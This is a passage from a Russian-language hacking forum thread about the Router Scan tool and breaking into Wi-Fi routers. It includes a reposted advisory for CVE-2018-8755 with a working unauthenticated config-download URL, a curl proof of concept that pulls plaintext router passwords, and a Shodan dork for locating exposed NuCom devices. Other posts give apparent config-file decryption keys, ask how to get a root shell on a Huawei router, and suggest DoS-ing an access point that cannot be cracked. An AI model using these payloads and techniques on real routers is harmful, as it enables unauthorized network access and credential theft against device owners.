прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. mxhelmy

    mxhelmy New Member

    Joined:
    11 May 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Do you have any idea how to enter shell mode on Huawei HG630 V2,after decrypting the defaultcfg.xml there is no passoword for shell, I can have connection with the telnet,ssh now but the shell commands is limited on save,reboot,restore , I tried to write shell,welcome to shell, sh but there not working all non supported commands returns "command failed"
     
  2. keshavredina

    keshavredina Member

    Joined:
    30 Mar 2016
    Messages:
    41
    Likes Received:
    10
    Reputations:
    0
    Знайте: с вами так долго не прокатит, лучше бросайте это нехорошее дело, иначе можете сильно попасть, и тогда будете жалеть.
     
  3. khamyk

    khamyk Well-Known Member

    Joined:
    30 Dec 2013
    Messages:
    552
    Likes Received:
    337
    Reputations:
    0
    Слышь правильный, онлайн церковь на другом сайте!
     
    010001110101011, sha9, oleedd and 3 others like this.
  4. Hose12

    Hose12 Member

    Joined:
    13 Aug 2015
    Messages:
    107
    Likes Received:
    68
    Reputations:
    0
    По-моему он свой пароль в базу сканом загрузил, теперь рвёт волосы во всех местах.
     
    010001110101011, robert, sha9 and 6 others like this.
  5. Tudiblad

    Tudiblad Member

    Joined:
    3 Oct 2017
    Messages:
    58
    Likes Received:
    19
    Reputations:
    0
    Очень напоминает сценарий фильма по бизнесмена Фому. :)
     
    sha9 likes this.
  6. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,025
    Likes Received:
    3,355
    Reputations:
    72
    Ну если взломать не удается, то можно положить точку дос атакой.
    Кто это запретил воровать? Ты спроси об этом у депутатов, они тебе скажут.
    Когда от большого берется немножко, это не воровство, а просто дележка.
    Иди матчасть учи, а то сам попадешь и будешь жалеть.
    Ну и в третьих. Кого только не рожают.
     
    Majgap, chugunkin, sha9 and 4 others like this.
  7. mxhelmy

    mxhelmy New Member

    Joined:
    11 May 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Are you guys fighting over me or what?
     
  8. qwerty_332

    qwerty_332 Banned

    Joined:
    21 Mar 2017
    Messages:
    31
    Likes Received:
    13
    Reputations:
    0
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    В первой мало смысла, для неё нужно быть залогиненным (почитайте внимательно код). Хотя может быть можно её приспособить для вытаскивания пароля админа при заходе юзером, но не думаю, что это будет так просто...

    Вторая вообще для UPnP, а не для веб морды роутера.
    Определение поправил, там всё было предельно просто. :) Но на всех трёх IP уязвимость закрыта.
     
    sha9, Triton_Mgn, Kakoluk and 3 others like this.
  10. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    78
    Reputations:
    51
    А где брать поправленые версии? Они обновляются на сайте http://stascorp.com/load/1-1-0-56? И как правильно их обновлять?
     
  11. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    @4ikotillo

    Если не ошибаюсь, то самые новые всегда тут!
     
    sha9, Toroid, hunt.lsk and 5 others like this.
  12. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    78
    Reputations:
    51
    Отлично! Спасибо, большое! =)
     
  13. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    простите за нескромный вопрос, а зачем вам лично понадобились инструменты для вардрайвинга,бэкдоры под туполинк и прошивки опеврт если вы такой законопослушный гражданин? коли охота сойти за правоборца, хотя бы удалите свои сообщения на форуме (по крайней мере некоторые из них):)


    п.с. не учите меня жить,лучше помогите материально (о.бендер) :p:D:D
     
    #6173 sha9, 4 Jul 2018
    Last edited: 4 Jul 2018
    Majgap, Gashek, Veil and 1 other person like this.
  14. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    эксплойт роутера NuCom NC-WR644GACV
    Overview
    ========
    Researchers of NVEL4 Cybersecurity company have discovered that it is
    possible to access to the config file bypassing admin authentication and
    authorization. The vulnerability has been reported to the vendor. The
    vendor has confirmed the vulnerability but not issued to security advisory.

    The recommendation to affected users is to update to the latest available
    version and change the credentials used, since they could have been
    extracted.

    Some NuCom routers are exposed to internet.
    Product Details
    =============
    * Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router)
    * Vendor: NuCom
    * Model Name: NC-WR644GACV
    * Vulnerable Software Version: <= STA 005
    * Fixed Software Version: STA 006

    Vulnerability Details
    ===================
    * CVE: 2018-8755
    * Name: Unauthenticated Configuration File Download
    * Type: Authentication / Authorization Bypass
    * Description: An unauthorizated user can download config file by
    accessing to the URL directly
    * Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download
    * Impact: By downloading the config file an attacker can read all
    password stored in plain-text and base64 then access vie web as
    administrator and gain privileged control of the device.

    PoC
    ====

    zerial@home:~$ curl -s "http://vulnerable.hostname/
    cgi-bin/config_download.cgi?action=download"|strings|grep -i password
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
    PASSWORD HERE]
    InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
    WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
    PASSWORD HERE]
    zerial@home:~

    шодан дорк
    NC-WR644GACV
     
    Kakoluk, Mednik, hydra and 5 others like this.
  15. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    to binarymaster.
    А можно ли добавить в секции настроек файлов авторизации, дурацкую кнопку "Перезагрузить словари"?
    Дело в том, что не редко приходится редактировать/менять словари "на ходу", не останавливая сканирования, и приходится выбирать файлы пар(проводник) и применять. Не особо удобно, если словари прежние, но только что отредактированы.
    Понимаю, мелко. Но если не трудно, сделайте плиз. :)
     
    sha9 and startless like this.
  16. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    В последней ночной сборке словари перезагружаются при открытии окна настроек по нажатию OK.
     
    sha9, startless, CRACK211 and 9 others like this.
  17. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    hw_ctree.xml - 074318473
    hw_ctree(1).xml - 37111111
     
    4Fun, sha9, CRACK211 and 7 others like this.
  18. muroslavvv

    muroslavvv New Member

    Joined:
    21 Jun 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Нажать скачать или скачать пре-релиз ? В шапке*
     
  19. robert

    robert Member

    Joined:
    9 Mar 2018
    Messages:
    9
    Likes Received:
    10
    Reputations:
    0
    Хмм.... ТП везде ТП. Где здесь кнопка "Без баб"/"Избавить от женских сообщений"?
     
    sha9 likes this.
  20. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    комичность ситуации не в этом
    но согласно писанию, лицемерие еще больший грех. ;):D:D:D
     
    DSL2650NRU and Gashek like this.